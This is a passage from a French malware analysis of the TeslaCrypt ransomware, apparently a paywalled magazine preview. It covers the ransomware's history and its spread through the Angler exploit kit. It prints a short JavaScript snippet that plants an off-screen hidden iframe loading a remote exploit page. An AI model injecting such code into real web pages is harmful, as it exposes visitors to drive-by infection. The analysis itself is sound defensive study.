Analyse du rançongiciel TeslaCrypt

Spécialité(s)


Résumé

Début 2015, un nouveau rançongiciel a vu le jour : TeslaCrypt. Ce malware a tout d'abord ciblé des machines avec certains jeux vidéo spécifiques installés pour aujourd'hui cibler tout type de machine sous Windows. En mai 2015, des chercheurs (http://blogs.cisco.com/security/talos/teslacrypt) ont trouvé une faiblesse dans l'implémentation du déchiffrement des fichiers. Peu après cette découverte, les développeurs du malware ont implémenté une version 2.0 du rançongiciel corrigeant leur erreur. Aujourd'hui, nous sommes à la version 3.0 de ce code.


1. Vecteurs d'infections

Les auteurs de TeslaCrypt ont diversifié les vecteurs d'infections du malware au fil des mois. Nous allons brièvement voir 2 cas.

1.1 Exploit kit : Angler

En mars 2015, les auteurs ont utilisé un Exploit Kit afin de diffuser leur malware. Cet exploit kit pouvait utiliser la vulnérabilité Flash CVE-2015-0311 dans le but d’exécuter un binaire TeslaCrypt ciblant les navigateurs Internet Explorer et Opera.

Une iframe était alors créée :

setTimeout(

  function(){

    var d = document.createElement('div');

    d.id='counter_value';

    d.style.position='absolute';

    d.style.left='700px';

    d.style.top='-1000px';

    d.innerHTML='<iframe src="http://url"></iframe';

    document.body.appendChild(d)},55);

L'Exploit Kit vérifiait également la présence d'outil de sécurité, ou de sandbox via Microsoft.XMLDOM. Voici par exemple la détection de l'outil de virtualisation...

Cet article est réservé aux abonnés. Il vous reste 92% à découvrir.
S'abonner à Connect
  • Accédez à tous les contenus de Connect en illimité
  • Découvrez des listes de lecture et des contenus Premium
  • Consultez les nouveaux articles en avant-première
Je m'abonne


Article rédigé par

Abonnez-vous maintenant

et profitez de tous les contenus en illimité

Je découvre les offres

Déjà abonné ? Connectez-vous